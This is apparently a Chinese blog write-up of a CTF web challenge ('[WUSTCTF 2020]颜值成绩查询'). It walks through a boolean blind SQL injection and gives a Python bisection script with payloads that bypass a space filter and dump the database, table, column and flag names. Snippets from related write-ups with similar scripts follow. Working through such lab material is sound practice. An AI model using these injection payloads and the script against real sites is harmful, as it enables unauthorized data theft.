[WUSTCTF 2020]颜值成绩查询

最新推荐文章于 2025-10-17 18:54:06 发布
原创 最新推荐文章于 2025-10-17 18:54:06 发布 · 374 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全

[WUSTCTF 2020]颜值成绩查询

拿到题目一看,输入1-4都有学生成绩,想到可能是sql注入

首先先用burp fuzz一下过滤了些什么

结果如下

不像别的大佬wp所述,我这里空格的返回长和其他都是一样的,但是这个TRUE说明sql注入的方向确实是正确的,只能猜测一下过滤了哪些字符,然后找到空格是过滤了的,看到返回结果只有两种情况,尝试布尔盲注

脚本摘自白初&师傅,四个payload自己根据过滤修改

import requests
 import time
 ​
 url = 'http://cd82b63c-6c9a-46d7-8288-09fea5ba97f3.node5.buuoj.cn:81/?stunum='
 i = 0
 flag = ''
 while True:
     i += 1
     # 从可打印字符开始
     begin = 32
     end = 126
     tmp = (begin + end) // 2
     while begin < end:
         print(begin, tmp, end)
         time.sleep(0.1)
         # 爆数据库
         # payload = "1/**/and/**/(ascii(substr(database(),%d,1))>%d)" % (i, tmp)
         # 爆表
         # payload = "1/**/and/**/(ascii(substr((select(GROUP_CONCAT(TABLE_NAME))from(information_schema.tables)where(TABLE_SCHEMA=database())),%d,1))>%d)" % (i, tmp)
         # 爆字段
         # payload = "''or(ascii(substr((select(GROUP_CONCAT(COLUMN_NAME))from(information_schema.COLUMNS)where(TABLE_NAME='*****')),%d,1))>%d)" % (i, tmp)
         # 爆flag
         # payload = "1/**/and/**/(ascii(substr((select(group_concat(******))from(******)),%d,1))>%d)" % (i, tmp)
 ​
 ​
         r = requests.get(url + payload)
         if 'admin' in r.text:
             begin = tmp + 1
             tmp = (begin + end) // 2
         else:
             end = tmp
             tmp = (begin + end) // 2
 ​
     flag += chr(tmp)
     print(flag)
     if begin == 32:
         break
 payload = "1/**/and/**/(ascii(substr(database(),%d,1))>%d)" % (i, tmp)

解释一下这个payload %d是占位符,对应i和tmp,substr从数据库database()的第i位截取一个字符取其ascii值和tmp的值进行对比,如果为TRUE结合1整体为TRUE,从而观察网页输出试出库名,同理试出表名和内容

这里截取输出的判断依据是网页中有admin字段,这在之前的fuzz测试时体现出来了

最后四个payload全用一遍,在value中找到flag

Amodabolia
关注
[WUSTCTF2020]颜值成绩查询 布尔注入二分法
m0_64180167的博客
09-26 268
正确回显 100 错误 显示 not。发现回显了 我们可以开始编写脚本跑了。这道题很简单 就是sql注入。我们来学习一下如何写盲注脚本。接下来就是爆破表和字段了。我们使用二分法来写一遍。这里很显然就是盲注了。回显了 就拿这个去咯。
[WUSTCTF2020]颜值成绩查询 1
qq_51553814的博客
08-22 772
[WUSTCTF2020]颜值成绩查询 1 解题 就是一个布尔盲注,尝试自己写了一下python脚本,磕磕绊绊最后还是写出来了 主要是学了一个二分法,理解了一下 import requests url="http://f8aed0d0-ab96-4a36-8022-2a70701fe282.node4.buuoj.cn:81/?stunum=" name='' for i in range(1,100): print(i) low=32 high=128 mid=(lo
[WUSTCTF2020]颜值成绩查询
最新发布
积累只要,在专与勤
10-17 407
sql注入 布尔注入
[WUSTCTF2020]颜值成绩查询 -wp
freerats的博客
08-05 695
改变参数stunum发现页面会发生变化。 通过尝试可知参数处有boolean盲注,0^1会出现1的内容,因此判断具有盲注。 写脚本跑一下: import requests url='http://57e002cb-19bd-4ceb-bc2a-6960ff6347ac.node3.buuoj.cn/index.php' flag='' for i in range(50): a = 32 b = 128 mid = (a+b)//2 while(a<b): .
buu-[WUSTCTF2020]颜值成绩查询
qaq517384的博客
10-08 522
[WUSTCTF2020]颜值成绩查询 报了个session的错,先不管 id输1234都有不同回显且url变为/?stunum=1,5就变成用户不存在了 ?stunum=1^0 ?stunum=1^0 可以用异或盲注 import requests url='http://3a1493b4-eefb-4eed-bb52-c5e5cfc25f91.node4.buuoj.cn:81/?stunum=' flag='' for i in range(1,100): low = 32
[WUSTCTF2020]颜值成绩查询 布尔盲注
qq_37301470的博客
12-02 351
[WUSTCTF2020]颜值成绩查询 只有一个输入框,是sql注入题目 尝试输入1,2,3 可以发现是get方法提交的参数且是数字型 故用hackbar /?stunum=1 or 1=2 %23 student number not exists. 刚刚还可以查到现在查不到了判断存在过滤 尝试下发现是空格 上盲注脚本 import string import requests select=f"select/**/value/**/from/**/flag" ans="" for i in ran
[WUSTCTF2020]颜值成绩查询1
alwtj的博客
06-10 499
又试了试报错闭合,联合注入之类的,结果输出的都是student number not exists.测试了一下从1输到了5,第五个显示 student number not exists.开局一个输入框,输入number查询成绩,还有2行报错,典型的sql注入题~没有出错,说明payload构建成功,那就开始写python代码~这段代码用了二分查找,开始执行~输入1 0 0 / 1 0 0。没有出错,说明空格被过滤了~获得flag,游戏结束~构造一下payload。
[WUSTCTF2020]颜值成绩查询(布尔注入)
记录学习,一起进步
01-27 899
[WUSTCTF2020]颜值成绩查询(布尔注入)
BUUCTF--Web-[WUSTCTF2020]颜值成绩查询
06-17
在BUUCTF的WUSTCTF2020 Web题目“颜值成绩查询”中,主要考察了对模板注入漏洞的理解与利用。该题目使用了PHP模板引擎Smarty,其核心在于如何通过用户输入影响模板渲染过程,并最终执行命令或读取敏感文件。 #### ...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值